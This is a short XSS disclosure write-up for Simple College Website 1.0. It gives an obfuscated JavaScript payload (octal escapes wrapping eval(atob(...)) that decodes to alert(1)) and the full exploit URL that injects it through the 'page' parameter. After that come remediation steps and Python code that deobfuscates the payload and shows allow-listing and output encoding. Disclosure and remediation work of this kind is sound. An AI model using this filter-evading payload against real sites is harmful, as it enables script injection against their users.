Simple College Website 1.0 — XSS


Identification

Burp Req/Res

Hacking

[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()
http://<domain>/college_website/index.php?page=<script>[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()</script>
Script execution

Remediation

  1. Filter input on arrival.
  2. Encode data on output.
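The payload above hides `filter`, `constructor`, `eval` and `atob` behind JavaScript octal escapes and a base64 wrapper, which is exactly what a string-matching input filter would miss; that is why step 2, encoding on output, carries the real weight. The following is an added example, not code from the write-up or from Simple College Website (which is PHP, not Python): it first unwinds the two obfuscation layers so a defender can see what the reflected string actually executes, then shows the two remediation steps applied to the `page` parameter. The allow-list of page names and the `example.test` host are assumptions for the example.

```python
import base64
import html
import re
from urllib.parse import parse_qs, urlsplit

# The obfuscated payload quoted in the write-up, kept as a raw string so the
# backslashes survive as JavaScript octal escapes.
PAYLOAD = (
    r'[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]'
    r'("\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()'
)


def decode_octal_escapes(js_source):
    """Turn JavaScript \\ooo octal escapes back into the characters they hide."""
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), js_source)


def unwrap_atob(js_source):
    """Base64-decode the first atob("...") argument, if any, to expose the wrapped call."""
    match = re.search(r'atob\("([A-Za-z0-9+/=]+)"\)', js_source)
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-8")


def deobfuscate(js_source):
    """Two-layer decode: octal escapes first, then the atob() wrapper passed to eval()."""
    layer1 = decode_octal_escapes(js_source)
    inner = unwrap_atob(layer1)
    return layer1, inner


# Hypothetical allow-list for the example; the real application's page names
# are not given in the write-up.
KNOWN_PAGES = {"home", "about", "courses", "contact"}
DEFAULT_PAGE = "home"


def select_page(requested):
    """Step 1, filter on arrival: 'page' selects a resource, so only known names are accepted."""
    return requested if requested in KNOWN_PAGES else DEFAULT_PAGE


def render_notice(requested):
    """Step 2, encode on output: anything reflected into HTML is entity-escaped first."""
    return "<p>Unknown page: {}</p>".format(html.escape(requested, quote=True))


def handle_request(url):
    """Return (page served, reflected HTML fragment) for a request URL, as a hardened index.php might."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    requested = params.get("page", [DEFAULT_PAGE])[0]
    page = select_page(requested)
    notice = render_notice(requested) if page != requested else ""
    return page, notice


if __name__ == "__main__":
    decoded, inner = deobfuscate(PAYLOAD)
    print("after octal decode:", decoded)
    print("inside atob():", inner)
    url = "http://example.test/college_website/index.php?page=<script>" + PAYLOAD + "</script>"
    print(handle_request(url))
```

Running the module prints the de-escaped payload and the `alert(1)` it wraps, then shows that the same URL now serves the default page and reflects only an entity-encoded copy of the injected value, with no `<script` left in the response.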

Gowthamaraj(@fuffsec)